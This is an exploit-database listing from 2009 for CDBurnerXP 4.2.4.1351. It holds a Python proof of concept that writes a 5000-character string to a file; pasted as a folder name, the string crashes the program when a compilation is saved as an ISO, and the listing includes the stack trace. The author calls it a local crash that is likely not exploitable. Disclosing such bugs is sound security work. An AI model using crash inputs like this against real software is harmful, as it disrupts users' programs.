Lucene search

K
zdtDr_IDE1337DAY-ID-9544
HistorySep 25, 2009 - 12:00 a.m.

CDBurnerXP 4.2.4.1351

2009-09-2500:00:00
Dr_IDE
0day.today
17

Exploit for unknown platform in category remote exploits

=====================
CDBurnerXP 4.2.4.1351 
=====================


# Title: CDBurnerXP 4.2.4.1351
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr_IDE
# Published: 2009-09-25
# Verified: yes

view source
print?
#!/usr/bin/env python
 
####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By: Dr_IDE
# Tested On:    XPSP3, 7RC
# Usage:    Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes:    Super lame and most likely not exploitable.
#
####################################################################################
 
'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
   at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
   at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
   at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
   at System.Windows.Forms.MenuItem.MenuItemData.Execute()
   at System.Windows.Forms.Command.Invoke()
   at System.Windows.Forms.Command.DispatchID(Int32 id)
   at System.Windows.Forms.Control.WmCommand(Message& m)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
   at System.Windows.Forms.ContainerControl.WndProc(Message& m)
   at System.Windows.Forms.Form.WndProc(Message& m)
   at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
   at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''
 
buff = ("\x41" * 5000)
 
f1 = open("cdburnerxp.txt","w")
f1.write(buff)
f1.close()



#  0day.today [2018-04-13]  #